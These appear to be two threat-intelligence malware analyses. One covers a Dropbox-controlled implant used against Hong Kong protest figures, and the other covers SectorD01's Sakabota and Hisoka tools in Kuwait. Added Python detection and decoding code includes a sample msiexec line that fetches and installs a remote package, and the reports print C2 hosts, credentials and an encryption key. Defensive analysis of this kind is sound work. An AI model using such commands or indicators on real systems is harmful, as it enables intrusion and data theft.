At the end of October, a person deeply involved in the pro-democracy side of the Hong Kong protests received a spear phishing email from someone claiming to be a law student at a top foreign university, requesting feedback on his supposed thesis, which included recommendations on how to end the Hong Kong unrest. The email contained a link to a Google Drive ZIP file.
The ZIP archive contained three files – an August 2019 policy brief downloaded from Freedom House regarding the Democratic Crisis in Hong Kong, a September 2019 Hong Kong report downloaded from Human Rights First, and a supposed RTF file from the Nikkei Asian Review.
The third file, masquerading as a Nikkei Asian Review document, is actually an LNK shortcut file with a double extension. When LNK files are viewed through archiving software, the double extension “.rtf.lnk” is shown correctly. If the file is extracted and viewed in Windows Explorer, however, the operating system hides the LNK extension by default.
The LNK file is actually a shortcut to the Windows utility msiexec.exe, which can be used as a LOLBin to download and run remote MSI files, in this case ones given a PNG extension. Here the MSI file is downloaded from a GitHub repository and account which were created on October 10.
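As an added illustration (not part of the original report), the following Python sketch flags msiexec.exe launches showing the traits described above: a package fetched over HTTP(S), a non-.msi extension on that package, a quiet install, and explorer.exe as the parent. The process records are constructed in the style of Sysmon Event ID 1, and the GitHub URL uses placeholder account and repository names.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); the URL
# uses placeholder names, not the real repository from the incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "msiexec.exe /q /i https://raw.githubusercontent.com/"
                "PLACEHOLDER-ACCOUNT/PLACEHOLDER-REPO/master/siHost64.png"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "msiexec.exe /V"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Users\alice\Downloads\setup.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi" /qn'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
INSTALL_SWITCH_RE = re.compile(r"(?<!\S)[/-](i|package)\b", re.IGNORECASE)
QUIET_SWITCH_RE = re.compile(r"(?<!\S)[/-]q", re.IGNORECASE)


def classify_msiexec_event(ev):
    """Return the reasons an msiexec.exe launch looks like LOLBin abuse.
    An empty list means none of the campaign's traits were present."""
    reasons = []
    if not ev["image"].lower().endswith("\\msiexec.exe"):
        return reasons
    cmd = ev["cmdline"]
    urls = URL_RE.findall(cmd)
    if not urls:
        return reasons  # local package installs are out of scope here
    if INSTALL_SWITCH_RE.search(cmd):
        reasons.append("installs a package fetched over HTTP(S)")
    for url in urls:
        name = url.rsplit("/", 1)[-1]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext != "msi":
            reasons.append(f"remote package extension '.{ext}' is not .msi")
    if QUIET_SWITCH_RE.search(cmd):
        reasons.append("quiet install (no UI shown to the user)")
    if ev["parent"].lower().endswith("\\explorer.exe"):
        reasons.append("parent is explorer.exe, consistent with a double-clicked .lnk")
    return reasons


def find_suspicious(events):
    """Pair each flagged event's command line with its reasons."""
    hits = []
    for ev in events:
        reasons = classify_msiexec_event(ev)
        if reasons:
            hits.append((ev["cmdline"], reasons))
    return hits
```

Only the first record is flagged; the service-started and local-MSI launches produce no reasons.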
The MSI file, “siHost64.png”, was created using a registered or cracked EXEMSI program. Running it drops and runs “siHost64.exe” in the %APPDATA% folder. This is a PyInstaller executable containing over a thousand files, but the important one is the compiled Python script “siHost64”.
By restoring the eight missing header bytes of “siHost64”, as is typically required for scripts extracted from PyInstaller executables, we were able to decompile the compiled Python script and analyze the functionality of this malware:
Use the Python requests library to call the Dropbox API, using Dropbox as an HTTPS C2 server
Use the system proxy for communications if any
Add itself to the registry AutoRun location HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the registry name “siHost64”. On October 31, the new version of the malware changed the registry name used to “Dropbox Update Setup”.
Perform AES encryption with CBC mode on uploaded files with the key “ApmcJue1570368JnxBdGetr*^#ajLsOw” and a random salt
Check in to the C2 server by creating an encrypted file containing the operating system version and architecture, date, computer name, and logged-in user
Check for files from the C2 server which contain encrypted arbitrary commands to be run, execute that command, and create a new encrypted file containing the results of the executed command.
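The header-restoration step mentioned before this list, shown as an added Python example that is not part of the original report. It generalizes beyond the eight-byte case in the sample: the number of header bytes PyInstaller strips depends on the interpreter the bundle was built with (8 for Python 2.x / pre-3.3, 12 for 3.3-3.6, 16 for 3.7+), and the magic number must be taken from an intact .pyc unpacked from the same archive. The stand-in script compiled in the demo is constructed for illustration.

```python
import importlib.util
import marshal
import struct
import sys


def pyc_header_length(version):
    """Bytes preceding the marshalled code object in a .pyc for `version`.
    2.x / pre-3.3: magic + mtime (8); 3.3-3.6: + source size (12);
    3.7+: magic + flags + mtime + source size (16)."""
    major, minor = version
    if major < 3 or (major == 3 and minor < 3):
        return 8
    if major == 3 and minor < 7:
        return 12
    return 16


def build_pyc_header(magic, version, mtime=0, source_size=0):
    """Assemble the header. `magic` is the 4-byte magic number of the
    interpreter that built the bundle (copy it from a sibling .pyc)."""
    length = pyc_header_length(version)
    if length == 8:
        return magic + struct.pack("<I", mtime)
    if length == 12:
        return magic + struct.pack("<II", mtime, source_size)
    return magic + struct.pack("<III", 0, mtime, source_size)  # flags = 0


def restore_pyc(stripped, magic, version):
    """Prepend the header so decompilers (and marshal) accept the file."""
    return build_pyc_header(magic, version) + stripped


def load_code_from_pyc(data, version=sys.version_info[:2]):
    """Parse a restored .pyc built for the running interpreter."""
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic number does not match this interpreter")
    return marshal.loads(data[pyc_header_length(version):])


def demo_roundtrip():
    """Constructed stand-in for the stripped entry script: compile it, keep
    only the marshalled code (what the unpacked bundle holds), restore the
    header, and execute the recovered code object."""
    source = "def build_checkin(host, user):\n    return host + '|' + user\n"
    code = compile(source, "siHost64", "exec")
    stripped = marshal.dumps(code)  # header-less, like the extracted script
    restored = restore_pyc(stripped, importlib.util.MAGIC_NUMBER,
                           sys.version_info[:2])
    namespace = {}
    exec(load_code_from_pyc(restored), namespace)
    return namespace["build_checkin"]("DESKTOP-CONSTRUCTED", "analyst")
```

With the header restored, the file can be fed to a decompiler matching the bundle's Python version instead of being loaded by marshal as the demo does.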
Based on the check-in information from infected machines, it appears that, besides the target described at the start, there is a single other infected victim in Hong Kong of interest to this threat actor connecting to the Dropbox app. The files exfiltrated from this victim appeared to be personal documents related to the victim traveling to the United States, business forms, and Christian hymns.
Besides those exfiltrated documents, the C2 server also appeared to host the actor's next-stage malware, such as two files named “GetCurrentRollback.exe” and “GetCurrentDeploy.dll”. “GetCurrentRollback.exe” is a signed Microsoft executable which appears to be used for upgrading a previous Windows version to Windows 10, and “GetCurrentDeploy.dll” is likely the name of the DLL that it side-loads. The earliest version of “GetCurrentRollback.exe” we could find dates from 2016 and the latest from November 2019, which means that at first glance all versions might be exploitable for DLL side-loading.
Based on the victim profile and the exfiltrated files, it appears that one of the intelligence requirements of the threat actor is to monitor people with relations to the Hong Kong protests, targeting either them or the people around them. There are multiple possible motives for this requirement, the most likely being to understand the inner thoughts of the pro-democracy movement, or to support or undermine the movement behind the scenes.
Using Dropbox and other legitimate services such as Google Drive and GitHub throughout the attack life cycle is not a new concept for threat actors, as it allows them to bypass network detection easily. To counter this threat, enterprises or teams within enterprises nowadays block or detect such Shadow IT services if they are not in official use, but individual or non-enterprise users who may be targeted by state-sponsored threat actors rarely have this luxury.
The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.firstname.lastname@example.org.
MITRE ATT&CK Techniques
The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.
Initial Access
T1192 Spearphishing Link
Execution
T1204 User Execution
T1218 Signed Binary Proxy Execution
T1064 Scripting
Persistence
T1060 Registry Run Keys / Startup Folder
Defense Evasion
T1140 Deobfuscate/Decode Files or Information
T1036 Masquerading
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1218 Signed Binary Proxy Execution
T1102 Web Service
Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
T1124 System Time Discovery
Collection
T1005 Data from Local System
Command and Control
T1043 Commonly Used Port
T1132 Data Encoding
T1071 Standard Application Layer Protocol
T1032 Standard Cryptographic Protocol
T1102 Web Service
Exfiltration
T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel
Multiple organizations in Kuwait have been targeted since 2018 by a threat actor we track as SectorD01, whose primary targets appear to be located in the Middle East but which we have also observed targeting North America, Europe, South Asia and East Asia in other campaigns. In this analysis we will briefly go through some of the tools used by this threat actor in the campaign, named Sakabota, Diezen, Gon, Hisoka, Netero, and EYE, and explain how these tools are linked to each other and to other activity in the region.
When we looked at 21 samples of the tool named Sakabota, we noticed the file internal comments “Blade for not to killing” and the file’s icon which resembles a scar and has the internal name “Icon_kenshin”. “Kenshin” is the name of the main character with that scar from the Japanese anime “Rurouni Kenshin”, otherwise known as “Samurai X” to English viewers. His sword is named Sakabatō, which is a reverse-edge sword which does not kill, and this lines up with the file internal comments of “not to [sic] killing”.
The samples we looked at had the version numbers 1.4, 1.5, 1.6, 2.5, and 2.6. Some of its functions include using WMIC/PSEXEC/dsquery/Mimikatz/plink/RAR, FTP uploading to ftp://www[.]pasta58[.]com with credentials “administrator”/”Mono8&^Uj”, downloading files, taking screenshots, performing RDP, IP/port scanning across common services, dropping the svhost.exe agent / Shell.aspx web shell (see below), clearing traces of itself, and closing itself. The hardcoded C2 addresses are set as pasta58[.]com and 176[.]9[.]235[.]101, and hardcoded DNSCAT C2 address as 217[.]79[.]183[.]33.
Besides the functionality changes across versions, the threat actor also attached various resources to the malware. Different samples had different resources attached to them, and this was irrespective of the version codes.
Trusted Microsoft command-line utility for querying Active Directory Services. v5.2.3790.3959
Most of the “k” resources we saw were empty, but there was one which contained a sort of cheat sheet of different commands which the attacker could use for many techniques such as password cracking, passing the hash, dumping passwords, using certutil, and using the other embedded resources. Interestingly, in one section of the cheat sheet, there were URL examples of how to access a web shell which could possibly be a GET version of LittleFace. This web shell URL contained the domain of a Taiwanese university, suggesting the university may have been compromised in the past.
64-bit NirCmd command-line utility from NirSoft. v2.81
Command-line PuTTY. v0.62
A shortened version of the open-source powercat PowerShell utility.
64-bit command-line WinRAR. v4.20
Trusted Microsoft utility which has so far only been publicly reported to be used by TwoFace in 2017.
Signed and trusted Sysinternals/Microsoft PsExec utility. v2.2. This is an old version of PSEXEC which allows the attacker to bypass the graphical EULA using the “-accepteula” flag.
Custom Shell.aspx web shell which uses md5 hashing to check the password given in the “id” parameter of the POST request. There are some commonalities between this web shell and the IntrudingDivisor web shell used by TwoFace, but this web shell is more limited in functionality and is used for uploading files or executing commands via “cmd.exe /c”. It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Shell” button in Sakabota. Only four samples of Sakabota contained the embedded Shell.aspx.
The executable svhost.exe dropper for the PowerShell malware Unit 42 named CASHY200, which accesses the C2 firewallsupports[.]com. This dropper had not been previously linked to the Sakabota malware. It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Agent” button in Sakabota. Only one sample of Sakabota contained the embedded svhost.exe.
Another backdoor with the picture of a samurai used by the attacker which connects to pasta58[.]com, the same C2 server as Sakabota.
Another interesting thing to note is that the Sakabota malware was made to work not only with the embedded resources above, but also with Mimikatz which we believe was not embedded due to the likelihood of Sakabota being detected more easily. All of these tools together bear a striking resemblance to the various tools uploaded to a TwoFace web shell in the past.
Diezen is a simple backdoor, droppable by Sakabota, which is set to connect to the same C2 address, pasta58[.]com, using a custom non-HTTP protocol over port 443 via the .NET TcpClient class, primarily to execute attacker commands via “cmd.exe /c”. The samples we looked at had the version numbers 0.0.1, 0.5, and 0.6.
By the time Diezen reached version 0.6, it switched over to port 80 and added new functionality for file upload, download, taking screenshots, checking the user’s public IP via checkip[.]dyndns[.]org and checking if an alternative autostart location – the Start Menu – was available besides its normal usage of scheduled tasks. The feature of checking the user’s public IP was later carried over to the Hisoka malware as well, alongside implementing the previously unimplemented decryption and encryption routines, while the screenshot feature was carried over to the Gon malware.
Gon is the main character from the Japanese anime “Hunter × Hunter”. When looking at Gon and the other “Hunter × Hunter” themed malware, their code appears to have been originally branched out from the Sakabota malware. In Gon’s case, not only are there the embedded resources dsquery and plink, a large part of the non-GUI code is exactly the same and in fact still has remnants of “Sakabota” in one of its strings.
Just as the various versions of Sakabota have added functionality which was in its code but previously unimplemented, Gon has implemented some of Sakabota’s previously unimplemented code and also contains a password list of slightly over 1000 passwords which are mainly variations around digits, the word “password”, and the word “kuwait”. These passwords are used for brute forcing from the tool.
EYE is the name of another simple tool we believe to be part of the attacker’s “Hunter × Hunter” themed toolset. The purpose of EYE is to log new processes created and to clear the attacker’s tracks when the attacker unexpectedly disconnects due to a new user logon. When looked at together with the other anime themed malware and the file icon, we believe the attacker thought of EYE as the scarlet eyes in “Hunter × Hunter”, giving the attacker additional capabilities when the attacker is emotionally agitated.
In fact, this clearing of tracks automatically upon disconnection is not a capability unique to the EYE malware, as the exact same function exists in Sakabota. It hooks the .NET event SystemEvents.SessionSwitch so that if the attacker gets disconnected unexpectedly due to a new user logon, it closes all processes created after EYE was opened and deletes files and registry keys related to attacker activity: recent files accessed, both automatic and custom jump lists (first introduced in Windows 7), remote desktop history, search terms, autocomplete, and Start Menu run history. It then closes and deletes itself.
Hisoka and Netero
Hisoka and Netero are also two important characters in the Japanese anime “Hunter × Hunter”.
Running Hisoka 0.8 with the argument “66” creates a “Help.txt” file in the same folder, and this file contains instructions on how to use and interact with Hisoka from both the victim’s and the attacker’s machine. It also contains functionality to query Active Directory via LDAP, which is likely meant to take over the functionality of the dsquery utility embedded in Sakabota. Funnily enough, the function is contained in an “AI” class of Hisoka which is most certainly not AI, proving even threat actors have joined the hype.
Hisoka is able to communicate with the attacker’s C2 server using a proper HTTP request over port 80 (unlike Diezen, which had its custom protocol and would be easily detected over the network) and DNS over port 53.
For its HTTP C2, it uses the hardcoded user agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36” from Chrome version 73, which was released on March 12, 2019.
For its DNS C2, it has an unused feature to perform an nslookup.exe check against hisoka[.]<C2_Address> in order to check its status which may be useful to check against later versions we have not seen. Example commands for performing its status check are:
On the other hand, the Netero malware is a helper utility and loader built for Hisoka and in fact cannot function without it. Unlike Hisoka, the attacker does not interact with Netero via command-line arguments but has to interact via modifying an obfuscated “command” in the registry. The way Netero loads and encrypts/decrypts data from the registry is similar to Hisoka – various registry keys from HKCU\EUDC\313\hisoka_v2 (Hisoka uses HKCU\EUDC\313\hisoka) are loaded, XOR-ed with 0x53, then Base64 decoded.
The attacker commands are loaded from HKCU\EUDC\313\hisoka_v2\CM and checked every 1-4 seconds. All of the other configuration, including the kind of C2 server to use, is loaded in the same way and checked constantly, with the result of any command being returned in another registry key. In this way, the attacker is able to interact constantly with Netero purely via the registry and no longer requires a GUI or CLI. Since the interaction with the registry has to be XOR-ed and Base64 encoded for every command, the attacker must be using another wrapper program for this interaction.
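The registry encoding described above, as an added Python example that is not part of the original report: values are recovered by XOR-ing each byte with 0x53 and then Base64-decoding the result. It assumes the values are read back as bytes (string values are encoded before decoding), and the sample values are constructed, not taken from a real infection; on a Windows host, dump_live_key walks the real HKCU key, elsewhere it returns an empty mapping.

```python
import base64
import binascii

NETERO_KEY = r"EUDC\313\hisoka_v2"   # under HKCU; Hisoka uses EUDC\313\hisoka
XOR_KEY = 0x53


def decode_value(raw):
    """Undo the storage encoding: XOR every byte with 0x53, then Base64-decode.
    Raises ValueError when the XOR output is not valid Base64, which is a
    cheap way to separate Netero-encoded values from unrelated ones."""
    unxored = bytes(b ^ XOR_KEY for b in raw)
    try:
        return base64.b64decode(unxored, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not a Netero-encoded value: {exc}") from None


def encode_value(plain):
    """Inverse of decode_value, used here only to build constructed samples."""
    return bytes(b ^ XOR_KEY for b in base64.b64encode(plain))


def decode_values(values):
    """Decode a {name: raw_bytes} mapping, recording failures as None."""
    out = {}
    for name, raw in values.items():
        try:
            out[name] = decode_value(raw)
        except ValueError:
            out[name] = None
    return out


def dump_live_key(subkey=NETERO_KEY):
    """On Windows, read and decode every value under HKCU\\<subkey>.
    Returns {} where winreg is unavailable or the key does not exist."""
    try:
        import winreg
    except ImportError:
        return {}
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                values[name] = data if isinstance(data, bytes) else str(data).encode()
                index += 1
    except OSError:
        return {}
    return decode_values(values)


# Constructed sample values (not from a real infection): one encoded command
# in the CM value and one unrelated value that should fail to decode.
SAMPLE_VALUES = {
    "CM": encode_value(b"whoami"),
    "Unrelated": b"plain text",
}
```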
The attacker also added another C2 “engine” to the Netero malware’s functionality. While Hisoka could previously already communicate with its C2 server via DNS and HTTP, Netero is also able to communicate with the C2 server via EWS ([Microsoft] Exchange Web Services), interacting with Microsoft Exchange servers using saved drafts in a manner reminiscent of how it interacts with the attacker via the registry.
Both Hisoka and Netero are stated to be “Compatible with Sakabota v3.4”, while later samples of Diezen were compatible with v2.0 and v2.1. While we did not find any version 3 or above samples of Sakabota, this shows that Sakabota is still in active development alongside the “Hunter × Hunter” themed malware, and the end goal is likely for either Sakabota or Hisoka to act as the wrapper for all of the other malware which interacts via command line / registry, similar to how Sakabota already acts as a wrapper for many other tools such as Mimikatz and PSEXEC.
Based on the attacker’s personal cheat sheet, the chunks of code dedicated to finding server software, and the internal web shell code, it is quite likely that one of the initial access routes used by the attacker is attacking organization web servers through SQL injection vulnerabilities for web shell upload, and organizations likely to be targeted should take note of this.
Also, since SectorD01 was first discovered in 2016, they have had a penchant for using DNS in their various malware for C2 communications, even until recently. One of the easy ways to detect this is to monitor the network for suspicious DNS traffic, although DNS over HTTPS may mask this in the future. It remains to be seen if the other teams of SectorD01 will take up EWS as a C2 protocol as well.
We believe Gon and the other “Hunter × Hunter” themed malware were branched off from Sakabota (and Diezen) to get around Sakabota’s large file size and eventually compartmentalize the attacker’s various tools into a sort of framework as their capabilities mature.
The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.
Initial Access
T1190 Exploit Public-Facing Application
Execution
T1059 Command-Line Interface
T1106 Execution through API
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1061 Graphical User Interface
T1047 Windows Management Instrumentation
Persistence
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1100 Web Shell
T1078 Valid Accounts
Privilege Escalation
T1100 Web Shell
T1053 Scheduled Task
T1078 Valid Accounts
Defense Evasion
T1140 Deobfuscate/Decode Files or Information
T1202 Indirect Command Execution
T1112 Modify Registry
T1064 Scripting
T1480 Execution Guardrails
T1107 File Deletion
T1070 Indicator Removal on Host
T1078 Valid Accounts
Credential Access
T1110 Brute Force
T1003 Credential Dumping
Discovery
T1087 Account Discovery
T1482 Domain Trust Discovery
T1010 Application Window Discovery
T1083 File and Directory Discovery
T1046 Network Service Scanning
T1135 Network Share Discovery
T1057 Process Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
Lateral Movement
T1210 Exploitation of Remote Services
T1075 Pass the Hash
T1076 Remote Desktop Protocol
T1105 Remote File Copy
T1021 Remote Services
T1051 Shared Webroot
T1077 Windows Admin Shares
Collection
T1113 Screen Capture
T1005 Data from Local System
T1039 Data from Network Shared Drive
Command and Control
T1043 Commonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding
T1001 Data Obfuscation
T1008 Fallback Channels
T1071 Standard Application Layer Protocol
Exfiltration
T1041 Exfiltration Over Command and Control Channel
T1048 Exfiltration Over Alternative Protocol
T1022 Data Encrypted
T1002 Data Compressed